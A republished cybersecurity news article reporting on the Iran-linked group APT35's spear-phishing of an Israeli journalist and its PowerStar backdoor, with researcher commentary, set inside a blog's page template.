Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    [mc4wp_form id=3515]
    What's Hot

    Name That Toon: Last Line of Defense

    April 16, 2024

    OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt

    April 16, 2024

    Middle East Cyber Ops Intensify, With Israel the Main Target

    April 16, 2024
    Facebook Twitter Instagram
    • Privacy Policy
    • Contact Us
    Facebook Twitter Instagram Pinterest Vimeo
    AI Home SecurityAI Home Security
    • Home
    • Home Security
    • Cyber Security
    • Biometric Technology
    Contact
    AI Home SecurityAI Home Security
    Home»Cyber Security»Iran-Linked APT35 Targets Israeli Media With Upgraded Spear-Phishing Tools
    Cyber Security

    Iran-Linked APT35 Targets Israeli Media With Upgraded Spear-Phishing Tools

    justmattgBy justmattgJuly 2, 2023No Comments4 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email

    [ad_1]

    The Iran-linked threat group known as APT35 (aka Charming Kitten, Imperial Kitten, or Tortoiseshell) has updated its cyberattack arsenal with improved abilities to hide its actions, as well as an upgraded custom backdoor that it’s distributing via a spear-phishing campaign.

    The advanced persistent threat (APT) has been alleged to be operating out of Iran and primarily concerned with collecting intelligence by compromising account credentials and, subsequently, the email of individuals they successfully spear-phish.

    According to a blog post published by Volexity, the group has recently attempted a spear-phishing campaign targeting an Israeli journalist with a “draft report” lure. The “draft report” was a password-protected RAR file containing a malicious LNK file which downloaded a backdoor.

    The incident was a highly targeted attack; prior to sending malware to the victim, the attackers asked if the person would be open to reviewing a document they had written related to US foreign policy. The target agreed to do so, since this is not an unusual request in the journalism line of work, but APT35 didn’t send it right away — instead, the attackers continued the interaction with another benign email containing a list of questions, to which the target then responded with answers. After multiple days of benign and seemingly legitimate interaction, the attackers finally sent the “draft report” loaded with malware.

    Toby Lewis, global head of threat analysis at Darktrace, says APT35’s targeting profile is very much in the theme of what you’d expect to see from a group associated to the Iranian government. He says: “This is a group that’s trying to be bespoke, be stealthy, and stay under the radar, and so to do that you’re also going to really focus your social engineering to try and improve that return on the investment.”

    PowerStar Malware & Evolving Spear-Phishing Techniques

    In this most recent campaign, it delivered the PowerStar malware — an updated version of one of its known backdoors, known as CharmPower — which it sent via an email containing an .LNK file inside a password-protected .RAR file.

    When executed by a user, the .LNK file downloads PowerStar from the Backblaze hosting provider and attacker-controlled infrastructure, according to Volexity’s report. PowerStar then collects a small amount of system information from the compromised machine and sends it via a POST request to a command-and-control (C2) address downloaded from Backblaze.

    Volexity believes this variant of PowerStar to be especially complex, and suspects that it is likely supported by a custom server-side component, which automates simple actions for the malware operator. Also, a decryption function is downloaded from remotely hosted files which hinders detection of the malware outside of memory and gives the attacker a kill switch to prevent future analysis of the malware’s key functionality.
    “With PowerStar, Charming Kitten sought to limit the risk of exposing their malware to analysis and detection by delivering the decryption method separately from the initial code and never writing it to disk,” the company said. “This has the added bonus of acting as an operational guardrail, as decoupling the decryption method from its command-and-control server prevents future successful decryption of the corresponding PowerStar payload.”

    Lewis says that quest for return on investment for APT groups sometimes drives relatively unsophisticated, low-effort campaigns, but more often, “you’ve got groups that are going to get as sophisticated as they need to be to meet their objectives.” What that means can run the gamut: Some will be able to develop zero days, as opposed to just using something they got from somebody else; others will demonstrate sophistication in how they manage and control their infrastructure.

    The latter is the case with APT35. “When you’ve got the trade craft that we’ve got this group using, effectively bringing down custom payloads, it’s bringing down different modules from third party services,” he says. “Each different payload is going to be a little bit different, a little bit tweaked, and a little bit tuned, and … that sort of approach is absolutely what you’d expect to see.”

    Nonetheless, Volexity researchers said they regularly observe operations from the APT, but finds the group to rarely deploy malware as part of their attacks. “This sparing use of malware in their operations likely increases the difficulty of tracking their attacks,” according to the firm.

    APT35 has been active for more than a decade. According to a 2021 blog from Darktrace, APT35 has in that time launched extensive campaigns against organizations and officials across North America and the Middle East; public attribution has characterized APT35 as an Iran-based nation state threat actor. Recent campaigns were suspected to be in service to Iran’s potential physical targeting of dissenters for kidnapping and other kinetic ops.

    [ad_2]

    Source link

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleNew ‘Rustbucket’ Malware Variant Targeting macOS Users
    Next Article 3 Reasons SaaS Security is the Imperative First Step to Ensuring Secure AI Usage
    justmattg
    • Website

    Related Posts

    Cyber Security

    Name That Toon: Last Line of Defense

    April 16, 2024
    Cyber Security

    OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt

    April 16, 2024
    Cyber Security

    Middle East Cyber Ops Intensify, With Israel the Main Target

    April 16, 2024
    Add A Comment

    Leave A Reply Cancel Reply

    Demo
    Stay In Touch
    • Facebook
    • Twitter
    • Pinterest
    • Instagram
    • YouTube
    • Vimeo
    Don't Miss
    Cyber Security

    Name That Toon: Last Line of Defense

    justmattgApril 16, 2024

    [ad_1] The enemies are always getting closer, using the same advanced technologies as security pros…

    OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt

    April 16, 2024

    Middle East Cyber Ops Intensify, With Israel the Main Target

    April 16, 2024

    Muddled Libra Shifts Focus to SaaS and Cloud for Extortion and Data Theft Attacks

    April 16, 2024

    Subscribe to Updates

    Get the latest creative news from SmartMag about art & design.

    [mc4wp_form id=3515]
    Demo
    Top Posts

    Name That Toon: Last Line of Defense

    April 16, 2024

    OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt

    April 16, 2024

    Middle East Cyber Ops Intensify, With Israel the Main Target

    April 16, 2024
    Stay In Touch
    • Facebook
    • Twitter
    • Pinterest
    • Instagram
    • YouTube
    • Vimeo
    Latest Reviews
    Cyber Security

    Name That Toon: Last Line of Defense

    justmattgApril 16, 2024

    [ad_1] The enemies are always getting closer, using the same advanced technologies as security pros…

    Cyber Security

    OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt

    justmattgApril 16, 2024

    [ad_1] Apr 16, 2024NewsroomSupply Chain / Software Security Security researchers have uncovered a “credible” takeover…

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    [mc4wp_form id=3515]
    Demo
    MOST POPULAR

    Name That Toon: Last Line of Defense

    April 16, 2024

    California mountain lion P-22 left mark on wildlife conservation

    January 1, 2023

    Congress Again Writes To Home Minister Amit Shah Over Rahul Gandhi’s Security

    January 1, 2023
    OUR PICKS

    Name That Toon: Last Line of Defense

    April 16, 2024

    OpenJS Foundation Targeted in Potential JavaScript Project Takeover Attempt

    April 16, 2024

    Middle East Cyber Ops Intensify, With Israel the Main Target

    April 16, 2024

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    [mc4wp_form id=3515]
    Facebook Twitter Instagram Pinterest
    • Privacy Policy
    • Contact Us
    AI Home Security © 2025 All rights reserved | Designed By ESmartsSolution

    Type above and press Enter to search. Press Esc to cancel.

    ↑